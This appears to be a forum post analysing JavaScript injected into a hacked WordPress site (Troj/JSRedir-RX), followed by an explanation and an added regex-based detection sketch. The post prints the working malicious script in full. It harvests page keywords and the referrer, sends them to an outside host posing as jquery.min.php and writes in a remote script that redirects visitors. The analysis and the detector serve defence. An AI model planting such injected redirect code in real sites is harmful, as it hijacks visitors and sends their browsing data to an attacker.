What does this virus do?
Good day everyone.
After the next WordPress update, Yandex swore at my site for the presence of the Troj/JSRedir-RX virus.
Armed with the built-in editor and Chrome, I found the following code on my page (I added the checkOne function myself to make it easier to read).
Well, the subject itself.
function checkOne()
{
    var keywords='';
    var metas=document.getElementsByTagName('meta');
    if(metas)
    {
        for(var x=0,y=metas.length;x<y;x++)
        {
            if(metas[x].name.toLowerCase()=="keywords")
            {
                keywords+=metas[x].content;
            }
        }
    }
    return keywords!==''?keywords:null;
}
var a='';
setTimeout(10);
if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0
    ||document.referrer!==undefined||document.referrer!==''
    ||document.referrer!==null){
    document.write('<script type="text/javascript" src="http://ktm-pohlenz.de/js/jquery.min.php?c_utt=J18171&c_utm='
        +encodeURIComponent('http://ktm-pohlenz.de/js/jquery.min.php'+'?'
            +'default_keyword='
            +encodeURIComponent(
                (
                    (k=checkOne())==null?(
                        v=window.location.search.match(/utm_term=([^&]+)/))==null?
                            (t=document.title)==null?'':t
                        :v[1]
                    :k))
            +'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');
}
1. The function checkOne() gets the keywords from the tag <meta name="keywords" content="..." />
2. If the keywords are not found, then the script takes the keywords from utm_term.
3. If key phrases from utm_term are not found, then the title of the page is used.
The found keywords are encoded and sent to ktm-pohlenz.de/js/jquery.min.php. As a result, JavaScript is inserted that redirects the user to the URL that best matches the found keywords and the page's HTTP referer. Example for this page:
PS: The redirect is not always returned. Perhaps there is some kind of filtering on the side of ktm-pohlenz.de by IP, UA, c_utt parameter, etc.
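
A defensive sketch built on the traits described in the answer above, added here and not part of the original question or answer: it scans saved page HTML for inline scripts that write a script tag pointing at another host while reading the referrer or page keywords. The function names, the indicator set, the threshold and the sample page (with the placeholder hosts myshop.example and cdn.example.net) are assumptions constructed for illustration.

```javascript
// Added example: static triage of inline <script> blocks in saved page HTML.
// Indicator names and the scoring threshold are assumptions made for this sketch.
const INDICATORS = {
  writesScriptTag: /document\.write\s*\(\s*['"]<script/i,
  readsReferrer: /document\.referrer/,
  harvestsKeywords: /["']keywords["']|utm_term=|document\.title/,
  splitClosingTag: /<['"]\s*\+\s*['"]\/script>/i,
};

// Hosts of absolute URLs in the script body that differ from the site's own host.
function externalHosts(body, siteHost) {
  const hosts = new Set();
  for (const m of body.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    const host = m[1].toLowerCase();
    if (host !== siteHost.toLowerCase()) hosts.add(host);
  }
  return [...hosts];
}

function findSuspiciousInlineScripts(html, siteHost) {
  const findings = [];
  // The lazy match stops at the first literal closing tag, so a closing tag
  // that the script builds by concatenation stays inside the captured body.
  const re = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  for (const [, attrs, body] of html.matchAll(re)) {
    if (/\bsrc\s*=/i.test(attrs)) continue; // only inline scripts are inspected
    const hits = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(body));
    const hosts = externalHosts(body, siteHost);
    // Flag: injects a script tag from another host and shows 2+ further traits.
    if (hits.includes("writesScriptTag") && hosts.length > 0 && hits.length >= 3) {
      findings.push({ indicators: hits, hosts });
    }
  }
  return findings;
}

// Constructed sample page: one benign inline script, one shaped like the injected code.
const SAMPLE_HTML = [
  "<html><head><title>Shop</title>",
  '<meta name="keywords" content="bikes">',
  '<script>document.title = "Shop"; console.log(document.referrer);</script>',
  "<script>document.write('<script type=\"text/javascript\" src=\"http://cdn.example.net/j.php?q='",
  "+encodeURIComponent(document.title)+'&se_referrer='+encodeURIComponent(document.referrer)",
  "+'\"><'+'/script>');</script>",
  "</head><body></body></html>",
].join("\n");

console.log(JSON.stringify(findSuspiciousInlineScripts(SAMPLE_HTML, "myshop.example"), null, 2));
```

A hit is a lead for manual review of the theme or plugin file that emitted the block, not a verdict: the benign script in the sample also reads the referrer and title but is not flagged because it injects nothing.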